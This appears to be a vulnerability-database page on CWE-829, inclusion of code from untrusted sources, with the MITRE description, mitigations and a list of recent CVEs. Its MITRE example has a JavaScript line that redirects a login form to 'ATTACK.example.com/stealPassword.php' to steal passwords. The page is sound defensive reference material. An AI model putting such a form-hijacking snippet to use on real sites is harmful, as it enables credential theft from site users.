Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CWE-829 (从非可信控制范围包含功能例程) — Vulnerability Class 110

110 vulnerabilities classified as CWE-829 (从非可信控制范围包含功能例程). AI Chinese analysis included.

CWE-829 represents a critical software weakness where applications import or execute functionality from sources outside their intended control sphere, such as unverified third-party libraries or external APIs. Attackers typically exploit this vulnerability by compromising the external source or manipulating the inclusion mechanism to inject malicious code, thereby gaining unauthorized execution privileges or causing system compromise. This often occurs when developers blindly trust dependencies without verifying their integrity or origin. To mitigate this risk, developers must implement strict dependency management practices, including rigorous code review processes and the use of cryptographic signatures to verify the authenticity of included components. Additionally, employing sandboxing techniques and maintaining a minimal attack surface by removing unnecessary external dependencies can significantly reduce the likelihood of successful exploitation, ensuring that only trusted, vetted functionality is integrated into the application’s core logic.

MITRE CWE Description
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or…
Mitigations (5)
Architecture and DesignUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and DesignWhen the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Architecture and DesignFor any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, OperationRun the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, OperationRun your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)
This login webpage includes a weather widget from an external website:
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>
Bad · HTML
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
Attack · JavaScript
CVE IDTitleCVSSSeverityPublished
CVE-2026-1699 Eclipse Theia - Website 安全漏洞 — Eclipse Theia - Website 10.0 Critical2026-01-30
CVE-2026-0770 Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability — Langflow 9.8 -2026-01-23
CVE-2026-22816 Gradle fails to disable repositories which can expose builds to malicious artifacts — gradle 8.2 -2026-01-16
CVE-2025-68924 Umbraco Forms 安全漏洞 — Forms 7.5 High2026-01-16
CVE-2025-70974 Fastjson 安全漏洞 — Fastjson 10.0 Critical2026-01-09
CVE-2020-36924 Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion — Sony BRAVIA Digital Signage 6.1 Medium2026-01-06
CVE-2020-36905 FIBARO System Home Center 5.021 Remote File Inclusion via Proxy API — Home Center 3 7.5 High2026-01-06
CVE-2025-67842 Mintlify 安全漏洞 — Mintlify Platform 6.4 Medium2025-12-19
CVE-2025-68162 JetBrains TeamCity 安全漏洞 — TeamCity 2.7 Low2025-12-16
CVE-2025-67900 NXLog Agent 安全漏洞 — NXLog Agent 8.1 High2025-12-14
CVE-2025-65964 n8n Vulnerable to Remote Code Execution via Git Node Custom Pre-Commit Hook — n8n 9.8AICriticalAI2025-12-08
CVE-2025-53841 Akamai Guardicore Platform Agent 安全漏洞 — Guardicore Platform Agent 7.8 High2025-12-03
CVE-2025-66022 FACTION Unauthenticated Custom Extension Upload leads to RCE — faction 9.7 Critical2025-11-26
CVE-2025-33205 NVIDIA Nemo Framework 安全漏洞 — NeMo Framework 7.3 High2025-11-25
CVE-2024-32011 Siemens Spectrum Power 安全漏洞 — Spectrum Power 4 8.8 High2025-11-11
CVE-2025-12509 Scripts for the module Global_Shipping executable on BRAIN2 Server — BRAIN2 8.4 High2025-10-31
CVE-2025-62726 n8n Vulnerable to Remote Code Execution via Git Node Pre-Commit Hook — n8n 8.8 High2025-10-30
CVE-2025-11023 Local File Inclusion in ArkSigner's AcBakImzala — AcBakImzala 9.8 Critical2025-10-23
CVE-2025-41390 TruffleHog 安全漏洞 — TruffleHog 7.8 High2025-10-20
CVE-2025-52655 HCL MyXalytics is affected by a Cross-Domain Script Include vulnerability. — HCL MyXalytics 3.1 Low2025-10-10
CVE-2025-62186 Ankitects Anki 安全漏洞 — Anki 6.7 Medium2025-10-07
CVE-2025-36355 IBM Security Verify Access code execution — Security Verify Access Appliance 8.5 High2025-10-06
CVE-2025-61592 Cursor CLI: Arbitrary Code Execution Possible through Permissive CLI Config — cursor 8.8 High2025-10-03
CVE-2025-59828 Claude Code Vulnerable to Arbitrary Code Execution via Plugin Autoloading with Specific Yarn Versions — claude-code 9.1AICriticalAI2025-09-24
CVE-2025-57729 JetBrains IntelliJ IDEA 安全漏洞 — IntelliJ IDEA 6.5 Medium2025-08-20
CVE-2025-8714 PostgreSQL pg_dump lets superuser of origin server execute arbitrary code in psql client — PostgreSQL 8.8 High2025-08-14
CVE-2025-36727 SimpleHelp Inclusion of functionality from untrusted control sphere — Simplehelp 8.3 High2025-07-25
CVE-2025-54558 OpenAI Codex CLI 安全漏洞 — Codex CLI 4.1 Medium2025-07-25
CVE-2025-27582 One Identity Password Manager 安全漏洞 — Password Manager 7.6 High2025-07-14
CVE-2025-53546 Folo allows secrets exfiltration via `pull_request_target` — Folo 9.1 Critical2025-07-09

Vulnerabilities classified as CWE-829 (从非可信控制范围包含功能例程) represent 110 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.